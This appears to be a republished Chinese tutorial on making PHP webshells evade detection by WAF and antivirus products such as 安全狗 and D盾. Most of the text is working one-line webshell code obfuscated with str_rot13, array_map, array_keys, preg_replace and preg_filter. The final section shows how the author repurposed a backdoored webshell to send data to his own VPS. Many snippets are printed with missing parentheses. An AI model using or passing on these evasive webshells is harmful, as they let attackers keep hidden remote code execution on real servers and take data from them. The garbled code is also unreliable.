本篇内容主要讲解“Webshell免杀怎么实现”,感兴趣的朋友不妨来看看。本文介绍的方法操作简单快捷,实用性强。下面就让小编来带大家学习“Webshell免杀怎么实现”吧!
一句话木马
在渗透测试中最常用的就是一句话后门(小马)和中国菜刀的配合。如果出现某种WAF防护,就寻找一个免杀的大马挂马。
最常见的php一句话木马
<?php @eval$_POST['x']);?>
这个一句话木马由两部分组成,eval用来执行接收的代码。$_POST['x']来接收数值。
本着这个原则,尝试改写一句话木马绕过WAF。
搜集了几个常用的php函数
执行代码的eval、assert、preg_replace
接收数据的$_POST、$_GET、$_REQUEST
php一句话免杀
str_rot13函数
<?php $c=str_rot13'nffreg'); $c$_REQUEST['x']); ?>
str_rot13函数来替代assert。该函数对字符串执行ROT13编码。ROT13编码就是把每个字母在字母表中移动13位。
测试发现无法绕过安全狗。修改一下。
<?php function xiaoma$a){ $c=str_rot13'nffreg'); $c$a); } xiaoma$_REQUEST['x']); ?>
即可绕过安全狗。
<?php class One{ function xiaoma$x){ $c=str_rot13'n!ff!re!nffreg'); $str=explode'!',$c)[3]; $str$x); } } $test=new One); $test->xiaoma$_REQUEST['x']); ?>
再次修改,加了explode函数分割字符串,class封装类。可绕过D盾。
array_map函数
array_map) 函数将函数作用到数组中的每个值上,并返回一个新的数组。
<?php $a1=array"1234","123456"); $a2=array@$_REQUEST['x'],"1234"); $a=array_mapnull,$a1,$a2)[0][1]; assert$a); ?>
即可绕过安全狗。
array_key函数
array_key) 函数也是返回包含数组的一个新数组。
<?php $a=array$_REQUEST['x']=>"3"); $b=array_keys$a)[0]; eval$b); ?>
索引数组变化为关联数组。
即可绕过安全狗、D盾。
preg_replace函数
用来正则匹配的一个函数。
<?php function func){ return $_REQUEST['x']; } preg_replace"/test/e",func),"i am test"); ?>
/e用来当做php代码解析。5.6版本以下实用。
测试可绕过安全狗和D盾。
preg_filter函数
根据preg_replace修改为preg_filter函数,也是用来执行正则的匹配替换。
<?php $a=preg_filter'/\s+/','','as s er t'); $a$_REQUEST['x']); ?>
也可以绕过D盾、安全狗。
其他
<?php function test$a){ $arr = array'a','s','s','e','r','t'); $func = ''; for$i=0;$i<count$arr);$i++) { $func.=$func.$arr[$i]; } $func=substr$func,-6); $func$a); } test$_REQUEST['x']); ?>
也可以绕过D盾、安全狗。
php免杀大马
正好自己手里有一个php大马。但不免杀。尝试将源码base64加密后修改为php免杀大马。
将大马eval函数变为exit或者echo。burp抓取源代码。
将源代码拷贝下来,审计发现给源码存在一处后门。
base64解码一下
哦!!!真是可以。
将该base64地址修改为自己的vps地址。嘻嘻。
那现在只要eval函数可以执行这传base64的字符串就可以啦。
WAF对base64_encode、base64_decode查杀非常严格。
不断搜索、修改、编写,最终成功。
<?php header"Content-type: text/html; charset=utf-8"); class one{ public function dama){ $l='base'; $o='64_de'; $v='co'; $e='de'; $love=$l.$o.$v.$e; $c="love"; $shellname='网站安全检测'; $password='xxx'; $myurl='http://www.xxx.com'; $a=$$c'code');//php源码 @eval$a); } } $person = new one; $person->dama); ?>
直接将php大马源码放在code处。即可。
也可以改造php免杀一句话木马。
比如这款
<?php header"Content-type: text/html; charset=utf-8"); function test$code){ $password='xxx'; $a=preg_filter'/\s+/','','base 64 _ deco de'); $c=$a$code); @eval$c); } $code=''; //code存放php大马 test$code); ?>
访问一下。
查看vps是否接收到。